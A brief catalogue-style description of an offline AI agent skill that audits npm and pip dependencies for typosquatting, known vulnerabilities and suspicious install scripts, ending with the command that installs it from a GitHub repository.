Before you let a skill run npm install or pip install, this auditor steps in to check for typosquatting, known CVEs, sketchy install hooks, and supply chain red flags. It walks through a five-point checklist covering package legitimacy, vulnerability severity, suspicious scripts, dependency depth, and license compatibility. The skill stays offline by design (network: false) so it leans on local audit commands and manual checks rather than live API calls. It's most useful when a skill you don't fully trust wants to pull in dependencies, or when you're doing periodic security sweeps. The output is a pass/warn/reject verdict with concrete next steps, not just a risk score.
npx skills add https://github.com/useai-pro/openclaw-skills-security --skill dependency-auditor